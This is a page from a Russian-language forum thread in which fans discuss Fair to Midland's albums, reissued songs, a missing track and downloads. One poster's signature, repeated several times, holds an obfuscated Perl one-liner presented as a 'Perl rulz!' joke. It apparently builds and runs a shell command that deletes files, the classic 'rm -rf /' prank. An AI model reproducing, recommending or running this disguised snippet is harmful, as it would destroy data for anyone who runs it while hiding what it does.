это когда много файлов бесит с рапиды ждать час или скока там, в зависимости от того скока стянул вродь _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
По-моему всегда час. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Dance Of The Manatee
Vice/Versa
A Seafarer's Knot
The Walls Of Jericho
Kyla Cries Cologne
Upgrade^Brigade
узнал, что эти песни были переизданы, поэтому наверно правильнее считать вторым, а не третьим альбом Fables From A Mayfly: What I Tell You Three Times Is True (все-таки 6 из 11 не новые песни), да и Walls Of Jericho из Inter.Funda.Stifle, больше подходит под Demo запись, чем альбомный.. _________________ Define the riddles of my mind
nothing is really as it seems
Поистене, интересная группа!
Основная фишка,я считаю, неординарная манера пения вокалиста.Хотя это никаким образом не затмит общее звучание группы,которое,стоит отметить, на высоте!
Отличное сочетание динамики и мелодичности.И довольно-таки,интересная метаморфоза,как мне покзалось, произошла со стилем и звуком команды в период с первого на второй альбомы.Если дебютник просто до мозга костей взял своей "животной", агрессивной,но умеренной динамикой,то альбом inter.funda.stifle до невероятности не похож.Куда мелодичнее.
Однако, всей картины это не меняет.Парни на самом деле, весьма талантливые и техничные.Отдельно выделю гитариста и,ещё раз, вокалиста группы.
Ну и,конечно,же отдельное спасибо уважаемому Танкяну за приютение под своим крылом молодой группы!
бляяяяя...... ктонибудь!!!!!!
помогите мне это скачать/рипнуть/записать........
я уже хз что делать бля(((( _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Сб Мар 15, 2008 12:34 am Заголовок сообщения:
чтото типа концерта, выступление живое
их в контейнере закрыли типа с инструментами ) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Сб Мар 15, 2008 1:06 am Заголовок сообщения:
на самом деле охуенна ) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Мар 16, 2008 2:41 pm Заголовок сообщения:
у меня нет такой О_о с какого альбома? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Мар 16, 2008 2:50 pm Заголовок сообщения:
бляяяя тока щас заметил что на CCSL не хватает 6й песни О_о _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Часовой пояс: GMT + 4 На страницу Пред.1, 2, 3След.
Страница 2 из 3